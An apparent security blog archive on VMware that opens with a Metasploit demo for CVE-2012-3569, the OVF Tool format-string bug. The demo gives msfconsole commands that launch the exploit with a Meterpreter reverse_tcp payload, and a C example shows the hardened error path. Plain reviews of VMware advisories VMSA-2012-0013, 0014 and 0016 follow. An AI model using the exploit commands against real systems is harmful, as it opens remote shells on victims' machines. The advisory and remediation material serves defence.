Tag Archives: VMware

CVE-2012-3569 VMware OVF Tool Format String Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability on 2012-11-08
Metasploit PoC provided on 2013-02-04

PoC provided by :

Jeremy Brown
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s) :

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with :

VMware OVF Tool 2.1

Description :

This module exploits a format string vulnerability in VMware OVF Tool 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. The module has been tested successfully with VMware OVF Tool 2.1 on Windows XP SP3.

Commands :

use exploit/windows/browser/ovftool_format_string
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo
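The bug class behind this module, in an added C example that is neither the Metasploit module's nor VMware's code: when an OVF parser reports an error, text taken from the (untrusted) OVF file must be passed as a %s argument and never used as the printf format itself. The function names, the message text and the element name are made up for the illustration.

```c
/* Added example (not VMware's or Metasploit's code): a hardened error
 * path for an OVF parser, next to a description of the vulnerable one.
 * The "element" string comes straight from the OVF file being parsed. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical error reporter. The untrusted name is a %s argument, so
 * any '%' sequences inside it are copied literally into the message.
 *
 * Vulnerable pattern, for contrast (the format-string bug class):
 *     snprintf(out, n, msg);      // msg was built from file contents
 * Here the file contents become the format string and its %x/%n
 * directives are interpreted by printf.
 *
 * Returns the length snprintf would have written, like snprintf. */
int ovf_report_unknown_element(const char *element, char *out, size_t n)
{
    return snprintf(out, n, "ovftool: unknown OVF element <%s>", element);
}

/* Audit helper: count printf conversion directives in a string that
 * originated in an input file. A non-zero count in a value that later
 * reaches a printf-family call as the *format* is the bug; as a %s
 * argument it is harmless. "%%" is a literal percent and not counted. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped percent, skip both characters */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed element name, as a malformed OVF might carry it. */
    const char *hostile = "VirtualSystem%x%x%n";
    char buf[128];

    ovf_report_unknown_element(hostile, buf, sizeof buf);
    printf("%s\n", buf);   /* the %x%x%n survive only as literal text */
    printf("directives found in input: %d\n", count_format_directives(hostile));
    return 0;
}
```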

VMware Security Advisory VMSA-2012-0016 Review

VMware released, on 15 November 2012, one security advisory, VMSA-2012-0016, concerning the VMware vSphere API and the ESX service console.

VMware vSphere API denial of service vulnerability

The VMware vSphere API is affected by one vulnerability, CVE-2012-5703, with a 5.0 CVSS base score. The vulnerability was discovered and privately reported by Sebastián Tullo of Core Security Technologies. ESXi and ESX 4.1 are affected by this vulnerability.

Update to ESX service console bind packages

The ESX 4.1 bind-libs and bind-utils packages have been updated to fix multiple vulnerabilities. CVE-2012-1033 has a 5.0 CVSS base score, CVE-2012-1667 an 8.5 CVSS base score and CVE-2012-3817 a 7.8 CVSS base score. ESX 4.0 is also affected; its patch will be released later.

Update to ESX service console python packages

The ESX 4.1 python and python-libs packages have been updated to fix multiple vulnerabilities. CVE-2011-4940 has a 2.6 CVSS base score, CVE-2011-4944 a 1.9 CVSS base score and CVE-2012-1150 a 5.0 CVSS base score. ESX 4.0 is affected but no patch is planned.

Update to ESX service console expat package

The ESX 4.1 expat package has been updated to fix two vulnerabilities. CVE-2012-0876 has a 4.3 CVSS base score and CVE-2012-1148 a 5.0 CVSS base score. ESX 4.0 is affected but no patch is planned.

Update to ESX service console nspr and nss packages

The ESX 4.1 nspr and nss packages have been updated to fix two vulnerabilities. CVE-2012-0441 has a 5.0 CVSS base score, and this patch also resolves a certificate trust issue caused by a fraudulent DigiNotar root certificate. ESX 4.0 is also affected; its patch will be released later.

VMware Security Advisory VMSA-2012-0014 Review

VMware released, on 04 October 2012, one security advisory, VMSA-2012-0014, concerning VMware vCenter Operations, vCenter CapacityIQ and Movie Decoder.

VMware Movie Decoder Installer binary planting vulnerability

VMware Movie Decoder is affected by one vulnerability, CVE-2012-4897, with a 6.9 CVSS base score. The vulnerability was discovered and reported by Mitja Kolsek of ACROS Security. Movie Decoder versions prior to 9.0 are affected.

vCenter Operations cross-site scripting vulnerability

vCenter Operations is affected by an XSS vulnerability, CVE-2012-5050, with a 4.3 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. vCOps versions prior to 5.0.x are affected.

vCenter CapacityIQ path traversal vulnerability

vCenter CapacityIQ is affected by a path traversal vulnerability, CVE-2012-5051, with a 5.0 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. CapacityIQ versions prior to vCOps 5.0.x are affected.

VMware Security Advisory VMSA-2012-0013 Review

VMware released, on 30 August 2012, one security advisory, VMSA-2012-0013, concerning VMware vSphere and vCOps updates to third-party libraries.

vCenter and ESX update to JRE 1.6.0 Update 31

The Oracle Java used in vCenter and ESX is updated to JRE 1.6.0 Update 31, which fixes multiple vulnerabilities patched in the Oracle Java SE CPU of February 2012. The Oracle Java SE CPU of June 2012 is still not included in the update: it covers 14 vulnerabilities, 9 of which have a CVSS base score above 7.0, and a known exploit for CVE-2012-1723 is still active. CVE-2012-0547, fixed in the Oracle Security Alert of 30 August 2012, is also not fixed, but the CVSS base score of this vulnerability is 0.0.

vCenter 4.1 and ESX 4.1 are covered by this update, but no patches are available yet for vCenter 5.0 and Update Manager 5.0; those patches are pending.

vCenter Update Manager update to JRE 1.5.0 Update 36

The Oracle Java used in vCenter and ESX is updated to JRE 1.5.0 Update 36, which fixes multiple vulnerabilities patched in the Oracle Java SE CPU of June 2012. Update Manager 4.1 is covered by this update, but no patches are available yet for vCenter 4.0, VirtualCenter 2.5, Update Manager 4.0, ESX 4.0 and ESX 3.5; those patches are pending.

Update to ESX/ESXi userworld OpenSSL library

The OpenSSL library used in ESX and ESXi is updated from version 0.9.8p to version 0.9.8t to resolve nine security issues. Two of these nine security issues have a CVSS base score above 7.0. ESXi 4.1 and ESX 4.1 are covered by this update, but no patches are available yet for ESXi 5.0, ESXi 4.0, ESXi 3.5, ESX 4.0 and ESX 3.5; those patches are pending.

Update to ESX service console OpenSSL RPM

The OpenSSL RPM used in ESX is updated to version 0.9.8e-22.el5_8.3 to resolve a security issue. This security issue, CVE-2012-2110, has a CVSS base score of 7.5. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Update to ESX service console kernel

The kernel used in ESX is updated to resolve 14 security issues. Three of these 14 security issues have a CVSS base score above 7.0, and CVE-2011-1833 and CVE-2011-3209 have an unknown CVSS base score. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Update to ESX service console Perl RPM

The Perl RPM used by ESX is updated to perl-5.8.8.32.1.8999.vmw to resolve three security issues. One of these three security issues has a CVSS base score of 7.5. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Update to ESX service console libxml2 RPM

The libxml2 RPM used by ESX is updated to libxml2-2.6.26-2.1.15.el5_8.2 and libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security issue. This security issue, CVE-2012-0841, has an unknown CVSS base score. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Update to ESX service console glibc RPM

The glibc RPM used by ESX is updated to version glibc-2.5-81.el5_8.1 to resolve six security issues. CVE-2009-5029, CVE-2011-4609 and CVE-2012-0864 have an unknown CVSS base score. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Update to ESX service console GnuTLS RPM

The GnuTLS RPM used by ESX is updated to version 1.4.1-7.el5_8.2 to resolve three security issues. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Update to ESX service console popt, rpm, rpm-libs, and rpm-python RPMS

The popt, rpm, rpm-libs and rpm-python RPMs used in ESX are updated to resolve three security issues. ESX 4.1 is covered by this update, but no patch is available yet for ESX 4.0; that patch is pending.

Vulnerability in third-party Apache Struts component

Apache Struts used in vCOps is updated to version 2.3.4 to resolve five security issues. Two of these five security issues have a CVSS base score of 9.3 and active exploits. vCOps 5.0.x and 1.0.x are affected by this patch.